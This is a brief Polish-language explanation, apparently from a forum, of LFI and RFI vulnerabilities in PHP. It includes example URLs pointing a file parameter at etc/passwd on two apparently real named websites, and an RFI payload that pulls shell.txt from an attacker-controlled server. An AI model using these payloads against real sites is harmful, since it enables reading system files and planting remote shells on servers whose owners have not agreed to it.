RFI  (Remote File Include)
LFI (Local File Include)

LFI :
Odpalamy/Odczytujemy plik, który znajduje się na tym samym serwerze poprzez podanie ścieżki do niego.

Jest to błąd spowodowany niewłaściwym użyciem funkcji:

File()
Fread()
include()

przykład :
http://www.rabauer.info/index.php?file= … etc/passwd
http://www.allprof.com.pl/beautyimage/i … &id=44

RFI :
Podobny błąd do Lfi , ale wczytujemy plik z własnego serwera a nie ze strony ;]

np:  ?id=naszadres.pl/shell.txt?